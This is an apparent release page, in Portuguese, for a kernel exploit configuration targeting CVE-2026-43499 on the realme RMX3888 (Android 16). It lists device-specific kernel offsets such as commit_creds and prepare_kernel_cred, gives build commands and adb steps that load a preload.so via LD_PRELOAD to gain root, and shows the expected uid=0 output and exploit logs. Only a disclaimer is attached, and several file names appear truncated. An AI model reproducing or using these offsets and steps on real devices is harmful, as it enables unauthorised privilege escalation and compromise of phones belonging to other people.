Voltar às atualizações
New releaseJul 31, 2026

rmx3888-cve-2026-43499-config v0.2.0

CVE-2026-43499 configuração de exploit para realme RMX3888 (Android 16) - 20 offsets de kernel verificados

Compartilhar

Configuração do Exploit CVE-2026-43499 para realme RMX3888

Informações do dispositivo

  • Marca/Modelo: realme RMX3888
  • Versão do Android: 16 (SDK 36)
  • ID do build: BP2A.250605.015
  • Kernel: Linux 6.1.141-android14-11-o-gffc54a6d2287
  • SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
  • Arquitetura: ARM64 (aarch64)

Visão geral

Este repositório contém os arquivos de configuração completos para o exploit CVE-2026-43499 (GhostLock) direcionado ao dispositivo realme RMX3888. Todos os offsets de kernel foram extraídos e verificados a partir do boot.img do dispositivo.

Recursos

20 offsets de kernel verificados extraídos do vmlinux
Logging em tempo real com O_SYNC + fsync para segurança contra kernel panic
Configuração específica do dispositivo para RMX3888
Script de compilação com um clique com detecção automática do NDK
Documentação abrangente com guias de build

Arquivos incluídos

Arquivos de configuração

  • arget.h - Offsets de kernel específicos do dispositivo (20 offsets verificados)
  • common.h - Configuração de build com integração de logging
  • ealtime_log.h - Implementação de logging em tempo real

Documentação

  • BUILD_GUIDE.md - Guia de compilação completo
  • eport.md - Relatório de análise detalhado (Rodada 1)
  • ound2_report.md - Relatório de configuração (Rodada 2)
  • ROUND2_STATUS.md - Resumo do status de execução
  • compile_status.json - Status de build legível por máquina

Scripts

  • compile_rmx3888.sh - Script de compilação com um clique

Início rápido

Pré-requisitos

  • Android NDK r26d ou posterior
  • Ambiente Git Bash, Linux/WSL ou Termux

Compilação

git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh

No Git Bash do Windows, o script detecta automaticamente o caminho padrão do SDK usado pelo Android Studio e pelas ferramentas de linha de comando: /c/Android/Sdk/ndk/*.

Nota: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL e COPY_SPLICE_READ atualmente usam fallbacks compatíveis com build no cabeçalho do alvo RMX3888. Substitua-os por offsets vmlinux RMX3888 verificados antes de depender do comportamento em tempo de execução.

Uso

# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/

# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so

# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id

# Check logs
adb shell cat /sdcard/Download/log_*.txt

Offsets principais

Os principais offsets abaixo foram extraídos do kernel 6.1.141. Consulte a nota acima para entradas de fallback compatíveis com build que ainda precisam de verificação específica do RMX3888.

#define KIMAGE_TEXT_BASE        0xffffffc008000000ULL
#define INIT_TASK_OFF           0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF         0x0126bbe0ULL
#define COMMIT_CREDS            0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED     0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets

Recursos de logging

O módulo de logging em tempo real integrado fornece:

  • Caminho de log principal: /sdcard/Download/log_.txt
  • Caminho de fallback: /data/local/tmp/log_.txt
  • Seguro contra kernel panic: Usa O_SYNC + fsync() para gravação imediata em disco
  • Entradas com timestamp: Todas as entradas de log incluem timestamps precisos
  • Espelhamento em stderr: Os logs também são enviados para stderr para o adb logcat

Resultados esperados

Exploração bem-sucedida

uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...

Saída do arquivo de log

` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt

[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `

Solução de problemas

Consulte BUILD_GUIDE.md para instruções detalhadas de solução de problemas, incluindo:

  • Erros de compilação
  • Falhas em tempo de execução
  • Problemas de bypass do KASLR
  • Bloqueios de política SELinux

Aviso de segurança

⚠️ AVISO: Esta configuração é apenas para pesquisa de segurança autorizada.

  • Use apenas em dispositivos que você possui
  • Não distribua binários compilados sem autorização
  • Respeite as práticas de divulgação responsável
  • Os arquivos de log podem conter informações confidenciais do sistema

Detalhes técnicos

Processo de extração

  1. Boot.img descompactado usando o parser Android Boot Image v4
  2. vmlinux extraído usando vmlinux-to-elf (102.871 símbolos)
  3. 99.580 símbolos válidos analisados e processados
  4. 20 offsets críticos validados de forma cruzada
  5. Verificação de offsets por meio de verificações de consistência de endereços de símbolos

Verificação de offsets

  • Endereço base do kernel confirmado: 0xffffffc008000000
  • Todos os endereços de símbolos validados contra o layout de memória
  • Referenciado de forma cruzada com o dispositivo de referência (Google Pixel tokay)
  • Taxa de sucesso de extração de 100% (20/20 offsets)

Referências

Licença

Esta configuração é fornecida apenas para fins educacionais e de pesquisa em segurança.

Este repositório contém materiais de pesquisa em segurança. Os autores e contribuidores não são responsáveis por qualquer uso indevido ou dano causado por este código. Use por sua conta e risco e apenas em dispositivos que você possui ou para os quais tenha autorização explícita para testar.


Gerado: 2026-07-23
Versão do kernel: 6.1.141-android14-11-o-gffc54a6d2287
Verificação de offsets: 100% (20/20)
Status: Pronto para compilação

Categorias